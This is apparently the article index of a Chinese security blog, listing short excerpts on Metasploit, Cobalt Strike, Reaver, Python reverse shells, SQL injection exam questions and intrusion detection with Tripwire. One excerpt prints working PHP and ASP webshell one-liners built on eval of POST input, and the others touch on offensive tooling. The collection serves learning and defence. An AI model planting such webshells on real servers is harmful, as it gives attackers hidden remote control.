不急不躁

我们当然应该享受成功并心怀感激,但千万不要让感激变为骄傲

又一个信息安全笔试题(伪)权威解析

1、sql注入有以下两个测试选项,选一个并且阐述不选另一个的理由: A. demo.jsp?id=2+1 B. demo.jsp?id=2-1 选B,在 URL 编码中 + 代表空格,可能会造成混淆2、以下链接存在 sql 注入漏洞,对于这个变形注入,你有什么思路? demo.do...

2016-07-20 11:44:59

阅读数:5031

评论数:1

腾讯 2016 春招笔试(伪)权威解析

这篇文章的原文在:原文地址 1、应用程序开发过程中,下面哪些开发习惯可能导致安全漏洞? 在程序代码中打印日志输出敏感信息方便测试(√) 在使用数组前判断是否越界 在生成随机数前使用当前时间设置随机数种子(√) 设置配置文件权限为rw-rw-rw-(√) 只说一下第三个吧,给出篇文章随机数...

2016-06-04 09:47:41

阅读数:3651

评论数:0

Detux 沙盒搭建

Detux 介绍Limon 沙盒由于不是双机环境,被我搁置了,先解决 Detux 沙盒的问题 Detux 沙盒的 GitHub 地址和在线沙盒环境都给出了,如果想自己搭建也可以,作者在 GitHub 上指出其特别感谢 aurel,这个人构建了不同处理器的各种环境的虚拟机,供大家下载的地址问题出现...

2016-05-31 12:50:15

阅读数:1154

评论数:0

用 maptail 构建简易攻击地图

maptail 描述的资料没有一个讲在 Debian 下安装的,我看的都是使用 Cent OS 进行搭建,其实是基于 Nodejs,然后调用 WEB 服务器访问日志实时打印出访问信息,那么我们可以在 Debian 上很轻松的配置一套,不过首先要安装 Node.js 和 npm, npm 依赖 No...

2016-05-31 12:46:54

阅读数:1086

评论数:0

Web应用安全权威指南读书思维导图

拜读完了德丸浩的《Web应用安全权威指南》,果然如序中所写,“德丸本”名不虚传 由于有些图片过大,不得不进行压缩后再上传难免失真,如果难以看清可以联系我获取PDF版本

2016-04-06 14:45:36

阅读数:1736

评论数:1

怎样使用 Tripwire 来检测 Ubuntu VPS 服务器的入侵

介绍当管理联网服务器时,服务器的安全是一个非常复杂的问题。尽管可以配置防火墙、设置日志策略、购买安全服务或者锁定应用,如果你想确保阻止每次入侵这远远不够。 一个 HIDS 可以收集你电脑的文件系统和配置,存储这些信息用来参考和判断系统当前的运行状态。如果在已知安全的状态和当前状态之间发生了改动,...

2016-04-05 13:17:42

阅读数:1861

评论数:0

Shodan的利用

Shodan 注册后在用户中心会有一个API Key,利用这个 Key 可以使用 shodan 的命令行版本,首先下载这个项目 git clone https://github.com/achillean/shodan-python.git 然后安装python setup.py build ...

2016-04-05 13:02:56

阅读数:5373

评论数:0

密码找回和跨域的思维导图

最近总结了密码找回和跨域的知识,写了思维导图,制作软件是NovaMind

2016-03-03 13:41:14

阅读数:697

评论数:0

Kali 2.0 使用 Reaver 的注意事项

1、刚一开始使用这条命令 airmon-ng start wlan0 就可以开始了,需要注意的是,在Kali 2.0里开启的不再是mon0了,而是wlan0mon,所以不要和 Kali 1.X 的版本代码混淆2、Kali 1.X 的命令无效在Kali 2.0 中必须自己手动开启网卡的监听模式,所以...

2016-01-12 21:51:46

阅读数:4754

评论数:0

最短的各类一句话

转自:http://zone.wooyun.org/content/23474 菜刀readme.txt中附带一3个一句话: PHP: <?php @eval($_POST['chopper']);?> ASP: <%eval request("chop...

2015-11-07 07:53:36

阅读数:1019

评论数:0

Kali 相关辑录一

1.Kali 2.0 连接数据库首先判断数据库是否启动 service postgresql status 启动数据库 /etc/init.d/postgresql start设置数据库开机启动 update-rc.d postgresql enable查看端口使用情况 netsta...

2015-10-17 18:24:58

阅读数:591

评论数:0

Kali 2.0 安装 Cobalt Strike

Cobalt Strike 是什么我就不介绍了,只给出安装方法 本文针对最新的Cobalt Strike 3.0,环境为Kali 2.0 如果是其他版本的安装和其他环境的,请另搜其他文章1.代理Cobalt Strike 是不对中国地区开放下载的······我连接香港的VPN都不被允许,想要下...

2015-10-01 13:10:47

阅读数:4492

评论数:2

Ubuntu 15.04 折腾手记(2)

1. WineWine 是一款让你在 Linux、MAC 上运行 Windows 程序的软件 截至我写的时候,Wine最新版本是1.7.48 beta版 安装命令:sudo add-apt-repository ppa:ubuntu-wine/ppa sudo apt-get update s...

2015-08-04 07:38:23

阅读数:531

评论数:0

Python Security 之 反向Shell

首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。 我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机...

2015-07-14 19:44:36

阅读数:930

评论数:0

Python Security 之 端口扫描

这一章将会演示如何通过Python的网络连接来开发一个基础的端口扫描器 我们的设计思路是使用socket一遍又一遍的去连接ip与端口的组合的新值下面的代码就演示了如何使用内建的socket模块去建立一个socket连接import sockets = socket.socket() s.conn...

2015-07-14 19:28:40

阅读数:538

评论数:0

Python Security 入门

这篇文章假定你的系统是Linux,python版本是2.*。你可以使用内置的help()函数去了解一个函数的详细。记住这一点,它可以帮助你在学习语言的时候学习到更多的详细内容. 如help(type)有时你会想把一些变量和字符串连接起来然后通过脚本显示出来。那么你就需要使用str()函数把整型转...

2015-07-13 22:03:03

阅读数:433

评论数:0

Linux和Windows堆栈溢出利用对比

堆栈溢出的利用,有三大条件,一是返回点的定位,二是ShellCode的编写,三是跳转到ShellCode。1.返回点的定位在Windows下,F.ZH的在它经典的《菜鸟版Exploit编写指南之一》的文章中,详细的讲述了利用报错对话框精确定位溢出返回点的方法。 Windows下弹出报错对话框,显...

2015-07-13 14:17:41

阅读数:830

评论数:0

Metasploit 整理笔记

一.名词解释 exploit 测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果。常见的 有内存溢出,网站程序漏洞利用,配置错误exploit。 payload 我们想让被攻击系统执行的程序,如reverse shell 可以从目标机器与测试者之间建立一 个反响连接,...

2015-07-12 14:31:58

阅读数:8248

评论数:1

Metasploit 学习笔记

在Kali中使用Metasploit,需要先开启PostgreSQL数据库服务和Metasploit服务 然后就可以完整的利用 msf 数据库查询 exploit 和记录service postgresql start service metasploit start如果不想每次开机都这样,还可...

2015-07-11 23:11:05

阅读数:10817

评论数:0

缓冲区溢出学习

溢出学习整理笔记

2015-07-04 11:49:52

阅读数:894

评论数:0

提示
确定要删除当前文章?
取消 删除
关闭
关闭